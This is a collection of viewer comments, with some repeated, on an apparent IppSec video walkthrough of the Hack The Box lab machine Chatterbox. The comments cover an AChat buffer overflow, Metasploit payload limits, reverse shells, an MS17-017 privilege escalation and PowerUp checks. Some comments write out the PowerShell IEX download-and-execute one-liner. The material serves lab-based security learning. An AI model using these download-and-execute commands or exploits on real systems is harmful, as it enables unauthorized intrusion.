@37:00 when doing Metasploit, the encoder payload error happens when the payload cannot fit inside of the buffer requirements. A staged payload (though meterpreter_reverse_http should be) would be needed or other option (as you showed). Maybe the module is just bugged. You can view the source of the msf modules directly to see size requirements, but I wish that msf would just give a better error when this happens.
I dont understand 24:18. How can i learn this, any source ? My english is very bad. I listened 5-6 times but i dont understand, i want to read articles. Ok we have credentials, but how can use credentials?
im so glad you got the same encoder encoded the buffer successfully error, i had like flashbacks as that part happened and was so annoyed at it, plus side was it forced me to not be lazy and do the fun python exploit way
Did you try a staged payload? It's smaller and I think it makes it more likely to succeed. The buffer overflow has a limit on how many bytes of payload it can carry and also what byte sequences are allowed in the payload. If metasploit can't generate a payload given those constraints it will give an error. You could try a staged payload or use a reverse tcp shell and then use post/multi/manage/shell_to_meterpreter. I didn't try this box but I think this was the reason for the error.
The nmap scan said port 9255/ *TCP* and 9256/ *TCP* .. But exploit/windows/misc/achat_bof requires *UDP* for RPORT. TCP uses three-way-handshake to establish a connection, UDP uses connectionless communication (no handshakes). I think that could be one cause why it isn't working? (We don't get a connection as client.) _"Achat is vulnerable to a SEH-based stack buffer overflow, caused by improper bounds checking by AChat.exe. _*_By sending a specially-crafted UDP packet_*_ to the default port 9256 to overwrite the SEH handler, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash."_ source: www.speedguide.net/port.php?port=9256 Maybe it shouldn't be too easy to exploit via msfconsole, so the developer(s) used TCP.
I realise that this could be a silly question to ask, but how did you copy multiple pages of the terminal window @ 13:09 ? Keep up the good work ippsec!
Hello I followed your instruction and I can see Get Request in python http server with 200 Code, but Reverse shell is not showing up. Could you please give me some tips? Cause I am wondering that powershell comand you put in msfvenom payload creation should download file, but which cmd should execute file?
It sounds like you have an error in the script that is being downloaded. The IEX() stands for Invoke-Expression, so its executing whatever code it pulls down from the page. I'd suggest creating a windows box and manually executing the ps1 script and seeing if there are any errors.
Hi IppSec, I enjoyed your video and intend to run through all of them once I have mastered each box on my own. I actually found another way. Looking at installed applications using PowerShell:Invoke-WmiMethod -Namespace root\default -Class StdRegProv -Name EnumKey @(2147483650,"Software\Microsoft\Windows\CurrentVersion\Uninstall") | Select -ExpandProperty sNames I saw that the patch installed was KB4040973 = MS17-SEP5. I suspected the box to be vulnerable to MS17-017. I reworked the exploit to open a reverse shell rather than open a CMD prompt on the desktop running as Administrator (which is useless without a Remote Desktop connection). With the reverse shell I get a prompt running as nt authority\system.
@Rob Taylor: Thanks so much for this! If I may ask, how did you manage to compile the MS17-017.cpp code after modifying it? I tried to compile the original version (taken from SecWiki's GitHub repository) with "i686-w64-mingw32-g++ MS17-017.cpp -o MS17-017", and it gave me the error that Windows.h header error. I have the cross-compiler installed, so I was quite puzzled to see the error about the Windows header.
Just before I run Invoke-AllChecks I load the PowerUp Module into my session which contains Invoke-AllChecks. I used the IEX(New-Object Net.WebClient).downloadString('...') to load it.
Yes, i'm not a powershell expert but I think IEX evaluates an expression (downloaded from http server) and the expression defined the function Invoke-AllChecks. So once it's defined, he can just issue the function call to the recently defined function.
I think it has so many downvotes because the BOF on this machine sucks. It seems to only work for a few minutes after a reset, and only after many, many tries. And the ports don't always show up, did a full scan many times on different days and nothing seemed to be open, iirc I only found them after moving to a vip network. At least it taught me to keep trying over and over when I'm expecting something to work. Edit: and ping didn't work on the free vpn. Edit2: and I just remembered that only one payload seemed to encode properly, and the msf exploit doesn't seem to work at all. This box sucks big time.
When the box was released the service wouldn't restart after crash I know the admins did a patch to fix that by adding tasks to restart the service. That said I believe if you used the BOF and then didn't migrate from the process the tasks failed to restart so locked others out potentially causing it so they couldn't even see the ports in nmap scan. This box seemed unusable as free and not ideal for the HTB environment and much more suited to a vulnhub boot2root box
1:33 Again, shouldn't that be "I've already *run* it"? 16:52 You omitted the second S in substring. 35:54 I know you typed and said the same thing here, but this is the first time I see you use a 3-digit port number. 54:21 I recognize ducky and bunny. I appreciate your wish that people subscribe to your channel, but wouldn't a name other then pleasesubscribe give a better indication what it's for?
Been a while, not positive why I did 901 at 35:54. Was either just a mistake typing and i went with it, or did it out of fear of typing "00" (Null Byte) into a buffer overflow.. As for PleaseSubscribe - Its just a long probably overdone joke that i use for fields that truly don't matter. Sure I could name it like "AnyFilenameWillDo" but I think the target demographic of these videos doesn't need that level of detail.
The reason the metasploit payload you initially tried didn't work is due to the fact that the default meterpreter payloads you were trying to use are too big for this specific exploits. github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/misc/achat_bof.rb Says that the payload size can only be 730 bytes. So you needed to use a smaller payload in order for it to encoded properly :) Also you can run powershell functions by using 'IEX(New-Object net.webclient).downloadstring("blah/blah");Invoke-Function'. This way you don't have to modify the ps1 file every time in order to execute the function. Great video though, really making me kick myself for missing the Admin password being the same as Alfred's.
Thanks! Should of checked payload size, I had it working before the video think an update changed something. Anyways there was a script running every minute to restart ACHAT which killed meterpreter if you didn't auto migrate out. Was hoping to show that but oh well there will be another chance in the future. I generally avoid chaining a command to IEX as it introduced a unique character after a download. So you can run into weird situations where the semi-colon breaks it all together, or it downloads the script and fails to execute. Just modifying the ps1 script makes it less likely to miss the vulnerability due to odd edge cases.
That's fair, and yeah I hated that auto-restart script. I couldn't get the automigrate working in meterpreter and eventually just spawned into an empire listener and migrated using that.
I think people would have had a better time with this box if they used a standard reverse shell instead of a meterpreter reverse shell. I personally had no issues with the service crashing/sessions dying while using just a plain shell, even when I tested the exploit locally. I personally feel like this box got a lot of hate for no reason.
AS a noob who is on the long OSCP road, THIS IS THE BEST ALL ROUND BOX of the retired machines so far. Loads of useful teachings. Thanks IPP
So much satisfaction after each of your video I watch! Thanks again ippsec
@37:00 when doing Metasploit, the encoder payload error happens when the payload cannot fit inside of the buffer requirements. A staged payload (though meterpreter_reverse_http should be) would be needed or other option (as you showed). Maybe the module is just bugged.
You can view the source of the msf modules directly to see size requirements, but I wish that msf would just give a better error when this happens.
I dont understand 24:18. How can i learn this, any source ? My english is very bad. I listened 5-6 times but i dont understand, i want to read articles. Ok we have credentials, but how can use credentials?
im so glad you got the same encoder encoded the buffer successfully error, i had like flashbacks as that part happened and was so annoyed at it, plus side was it forced me to not be lazy and do the fun python exploit way
Did you try a staged payload? It's smaller and I think it makes it more likely to succeed. The buffer overflow has a limit on how many bytes of payload it can carry and also what byte sequences are allowed in the payload. If metasploit can't generate a payload given those constraints it will give an error. You could try a staged payload or use a reverse tcp shell and then use post/multi/manage/shell_to_meterpreter. I didn't try this box but I think this was the reason for the error.
The nmap scan said port 9255/ *TCP* and 9256/ *TCP* .. But exploit/windows/misc/achat_bof requires *UDP* for RPORT.
TCP uses three-way-handshake to establish a connection, UDP uses connectionless communication (no handshakes). I think that could be one cause why it isn't working? (We don't get a connection as client.)
_"Achat is vulnerable to a SEH-based stack buffer overflow, caused by improper bounds checking by AChat.exe. _*_By sending a specially-crafted UDP packet_*_ to the default port 9256 to overwrite the SEH handler, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash."_
source: www.speedguide.net/port.php?port=9256
Maybe it shouldn't be too easy to exploit via msfconsole, so the developer(s) used TCP.
management/spawnas > this module does the same job you did, elevate privileges to administrator when we supply the credentials
After 2 years I came to watch all the videos from the beginning 👍👍👍
*~2021~* *still watching and learn*
After 6 years I came to watch all his video from beginning )
just a confusion "pleasesubscribe.ipp" ? how does this file executes as its running powershell script....shouldnt it popup an error??
I realise that this could be a silly question to ask, but how did you copy multiple pages of the terminal window @ 13:09 ? Keep up the good work ippsec!
ua-cam.com/video/Lqehvpe_djs/v-deo.htmlm25s
Man, I guess ippsec has REALLY explained everything he does, cheers
Great video as always.
I think this box is very good for learning BOF.
It's not my bread, I'm rather a crypto guy.
Hello
I followed your instruction and I can see Get Request in python http server with 200 Code, but Reverse shell is not showing up.
Could you please give me some tips? Cause I am wondering that powershell comand you put in msfvenom payload creation should download file, but which cmd should execute file?
It sounds like you have an error in the script that is being downloaded. The IEX() stands for Invoke-Expression, so its executing whatever code it pulls down from the page. I'd suggest creating a windows box and manually executing the ps1 script and seeing if there are any errors.
47:09 you did actually write the password wrong. Fun video tho, and interesting with some windows boxes!
More Ninja stuff, great work!!!
1:12 "I'll be relatively *IppSec*"
Awesome ! got to know many methods to rooot
Hi IppSec, I enjoyed your video and intend to run through all of them once I have mastered each box on my own. I actually found another way. Looking at installed applications using PowerShell:Invoke-WmiMethod -Namespace root\default -Class StdRegProv -Name EnumKey @(2147483650,"Software\Microsoft\Windows\CurrentVersion\Uninstall") | Select -ExpandProperty sNames I saw that the patch installed was KB4040973 = MS17-SEP5. I suspected the box to be vulnerable to MS17-017. I reworked the exploit to open a reverse shell rather than open a CMD prompt on the desktop running as Administrator (which is useless without a Remote Desktop connection). With the reverse shell I get a prompt running as nt authority\system.
MS17-017 security bulletin was dated Oct 10, 2017
Good call! I definitely don’t do the best job when looking for PrivEscs due to bad system patching
@Rob Taylor: Thanks so much for this! If I may ask, how did you manage to compile the MS17-017.cpp code after modifying it? I tried to compile the original version (taken from SecWiki's GitHub repository) with "i686-w64-mingw32-g++ MS17-017.cpp -o MS17-017", and it gave me the error that Windows.h header error. I have the cross-compiler installed, so I was quite puzzled to see the error about the Windows header.
@@horizonholt8522 I used Visual Studio 2013 installed on a Windows VM to compile the exploit.
@@rtaylor777 Thank you for getting back to me! :)
Thanks for this video, damn thing was always crashing.
What terminal emulator are you using? I like the split function.
He uses Tmux
ua-cam.com/video/Lqehvpe_djs/v-deo.html
The box used to crash so much ... i didn't even bother trying to get in
How does Invoke-AllChecks work i tried it in my own machine and I didn’t find it there is other Invoke as Invoke-WebRequest but not all checks!?
Just before I run Invoke-AllChecks I load the PowerUp Module into my session which contains Invoke-AllChecks. I used the IEX(New-Object Net.WebClient).downloadString('...') to load it.
IppSec so the powersploit added the func!?
Yes, i'm not a powershell expert but I think IEX evaluates an expression (downloaded from http server) and the expression defined the function Invoke-AllChecks. So once it's defined, he can just issue the function call to the recently defined function.
I think it has so many downvotes because the BOF on this machine sucks. It seems to only work for a few minutes after a reset, and only after many, many tries. And the ports don't always show up, did a full scan many times on different days and nothing seemed to be open, iirc I only found them after moving to a vip network.
At least it taught me to keep trying over and over when I'm expecting something to work.
Edit: and ping didn't work on the free vpn.
Edit2: and I just remembered that only one payload seemed to encode properly, and the msf exploit doesn't seem to work at all.
This box sucks big time.
When the box was released the service wouldn't restart after crash I know the admins did a patch to fix that by adding tasks to restart the service. That said I believe if you used the BOF and then didn't migrate from the process the tasks failed to restart so locked others out potentially causing it so they couldn't even see the ports in nmap scan. This box seemed unusable as free and not ideal for the HTB environment and much more suited to a vulnhub boot2root box
I never managed to find those fuc*ing ports not even with masscan. wtf.
1:33 Again, shouldn't that be "I've already *run* it"?
16:52 You omitted the second S in substring.
35:54 I know you typed and said the same thing here, but this is the first time I see you use a 3-digit port number.
54:21 I recognize ducky and bunny.
I appreciate your wish that people subscribe to your channel, but wouldn't a name other then pleasesubscribe give a better indication what it's for?
Been a while, not positive why I did 901 at 35:54. Was either just a mistake typing and i went with it, or did it out of fear of typing "00" (Null Byte) into a buffer overflow..
As for PleaseSubscribe - Its just a long probably overdone joke that i use for fields that truly don't matter. Sure I could name it like "AnyFilenameWillDo" but I think the target demographic of these videos doesn't need that level of detail.
Powershell should have a wget alias you can use.
This box....ippsec!
The reason the metasploit payload you initially tried didn't work is due to the fact that the default meterpreter payloads you were trying to use are too big for this specific exploits.
github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/misc/achat_bof.rb
Says that the payload size can only be 730 bytes. So you needed to use a smaller payload in order for it to encoded properly :)
Also you can run powershell functions by using 'IEX(New-Object net.webclient).downloadstring("blah/blah");Invoke-Function'. This way you don't have to modify the ps1 file every time in order to execute the function.
Great video though, really making me kick myself for missing the Admin password being the same as Alfred's.
Thanks! Should of checked payload size, I had it working before the video think an update changed something. Anyways there was a script running every minute to restart ACHAT which killed meterpreter if you didn't auto migrate out. Was hoping to show that but oh well there will be another chance in the future.
I generally avoid chaining a command to IEX as it introduced a unique character after a download. So you can run into weird situations where the semi-colon breaks it all together, or it downloads the script and fails to execute. Just modifying the ps1 script makes it less likely to miss the vulnerability due to odd edge cases.
That's fair, and yeah I hated that auto-restart script. I couldn't get the automigrate working in meterpreter and eventually just spawned into an empire listener and migrated using that.
You are amazing
Lol you deleted the entire buffer overflow
I think people would have had a better time with this box if they used a standard reverse shell instead of a meterpreter reverse shell. I personally had no issues with the service crashing/sessions dying while using just a plain shell, even when I tested the exploit locally. I personally feel like this box got a lot of hate for no reason.
I thought this box was easy.. You lost me.. With the whole webserver setup.
I hate this box SO MUCH!!!
lol